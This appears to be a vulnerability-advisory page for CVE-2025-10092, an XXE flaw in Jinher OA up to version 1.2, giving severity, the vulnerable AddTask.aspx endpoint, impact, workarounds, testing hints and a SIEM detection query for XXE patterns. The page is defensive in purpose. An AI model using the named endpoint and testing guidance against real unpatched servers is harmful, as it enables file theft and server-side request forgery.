CVE-2025-10092 – This CVE describes an XML External Entity (XXE)... (How to Fix)

Q: What is the severity of CVE-2025-10092?

CVE-2025-10092 has a CVSS score of 7.3 (HIGH). This CVE describes an XML External Entity (XXE) vulnerability in Jinher OA software up to version 1.2. Attackers can exploit this to read sensitive files, conduct server-side request forgery, or potentially execute code by manipulating XML input. Organizations using Jinher OA versions up to 1.2 with the vulnerable XML handler component are affected.

📋 TL;DR

This CVE describes an XML External Entity (XXE) vulnerability in Jinher OA software up to version 1.2. Attackers can exploit this to read sensitive files, conduct server-side request forgery, or potentially execute code by manipulating XML input. Organizations using Jinher OA versions up to 1.2 with the vulnerable XML handler component are affected.

💻 Affected Systems

Products:

Jinher OA

Versions: Up to version 1.2

Operating Systems: Windows (likely)

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerability exists in the XML handler component at /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx/?Type=add

📦 What is this software?

Jinher Oa by Jinher

View all CVEs affecting Jinher Oa →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Remote attackers could read sensitive files (including configuration files with credentials), conduct SSRF attacks against internal systems, or potentially achieve remote code execution depending on system configuration.

🟠

Likely Case

Attackers will likely exfiltrate sensitive configuration files, credentials, or conduct SSRF attacks against internal services accessible from the vulnerable server.

🟢

If Mitigated

With proper network segmentation and XML parser hardening, impact is limited to information disclosure from files accessible to the web server process.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

The exploit has been made public according to the CVE description, and XXE vulnerabilities typically have low exploitation complexity with available tools.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Not available

Restart Required: No

Instructions:

No official patch available. Check with Jinher for security updates or consider upgrading to a newer version if available.

🔧 Temporary Workarounds

Disable XXE in XML parser

all

Configure the XML parser to disable external entity processing

Modify application configuration to set XML parser properties: FEATURE_SECURE_PROCESSING = true, disallow-doctype-decl = true

Input validation and sanitization

all

Implement strict input validation to reject XML containing external entity declarations

Implement XML schema validation or regex filtering for XXE patterns

🧯 If You Can't Patch

Implement a web application firewall (WAF) with XXE protection rules
Restrict network access to the vulnerable endpoint using firewall rules or network segmentation

🔍 How to Verify

Check if Vulnerable:

Test the endpoint /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx/?Type=add with XXE payloads using tools like XXEinjector or manually crafted XML with external entities

Check Version:

Check Jinher OA version in application interface or configuration files

Verify Fix Applied:

Retest with XXE payloads after implementing workarounds to ensure they no longer succeed

📡 Detection & Monitoring

Log Indicators:

Unusual XML parsing errors
Requests to /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx with XML content
Outbound connections from web server to unexpected internal systems

Network Indicators:

HTTP requests containing XML with DOCTYPE declarations or external entity references
Unusual outbound connections from web server following XXE exploitation

SIEM Query:

source="web_server" AND (uri="/c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx" OR content="<!DOCTYPE" OR content="%" OR content="SYSTEM")

📊 Metadata

CVE ID: CVE-2025-10092

CVSS v3 Score: 7.3 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CWE: CWE-610

EPSS Score: 0.02% exploit probability (5.2th percentile)

Published: September 8, 2025

Last Updated: October 9, 2025

🔗 References

https://github.com/Cstarplus/CVE/issues/3 Exploit,Issue Tracking,Third Party Advisory
https://vuldb.com/?ctiid.323047 Permissions Required,VDB Entry
https://vuldb.com/?id.323047 Third Party Advisory,VDB Entry
https://vuldb.com/?submit.644868 Third Party Advisory,VDB Entry

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-10092, you might also want to check these: